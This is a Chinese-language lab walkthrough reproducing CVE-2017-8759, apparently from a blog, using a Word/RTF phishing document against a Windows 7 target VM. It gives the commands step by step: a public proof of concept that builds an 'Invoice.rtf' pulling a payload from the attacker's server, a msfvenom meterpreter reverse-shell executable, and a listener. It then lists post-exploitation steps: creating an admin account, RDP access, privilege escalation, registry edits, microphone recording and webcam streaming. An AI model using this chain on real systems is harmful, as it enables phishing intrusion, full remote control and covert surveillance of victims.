CVE-2017-8759复现(word宏钓鱼)

CVE-2017-8759漏洞复现(word宏钓鱼)

0x01 虚拟机kali-linux、win7靶机

  • 1.为了方便起见,直接利用GitHub上的一个POC。

    git clone https://github.com/bhdresh/CVE-2017-8759.git

CVE-2017-8759复现(word宏钓鱼)_第1张图片

  • 2.利用cve-2017-8759_toolkit.py文件生成一个恶意rtf文件。

    python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.50.132/logo.txt

CVE-2017-8759复现(word宏钓鱼)_第2张图片

  • 3.利用msfVENOM生成一个反弹shell的exe文件,命名为shell.exe。

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.50.132 LPORT=4444 -f exe > /root/shell.exe

CVE-2017-8759复现(word宏钓鱼)_第3张图片

  • 4.监听来自木马文件执行后反弹的shell。

    python cve-2017-8759_toolkit.py -M exp -e http://192.168.50.132/shell.exe -l/root/shell.exe

4

  • 5.开启metasploit的监听模块进行监听,设置响应载荷以及监听IP。

CVE-2017-8759复现(word宏钓鱼)_第4张图片

  • 6.将恶意rtf文件发送到win7靶机上。当恶意文件被执行后,msf监听到反弹shell,然后建立会话连接,即可获取靶机控制权。

CVE-2017-8759复现(word宏钓鱼)_第5张图片

CVE-2017-8759复现(word宏钓鱼)_第6张图片

0x02 对win7靶机实现控制

  • 1.新建账号并加入管理组

CVE-2017-8759复现(word宏钓鱼)_第7张图片

  • 2.利用远程桌面客户端连接靶机的远程桌面服务

    rdesktop -u hacker -p 123456 192.168.50.134(此处为靶机IP)

CVE-2017-8759复现(word宏钓鱼)_第8张图片

CVE-2017-8759复现(word宏钓鱼)_第9张图片

0x03 其他的一些骚操作

  • sysinfo 获取系统信息

  • getsystem 获取高权限

  • reg 修改注册表

  • record_mic 音频录制

  • webcam_stream 摄像头视频获取

你可能感兴趣的:(漏洞复现)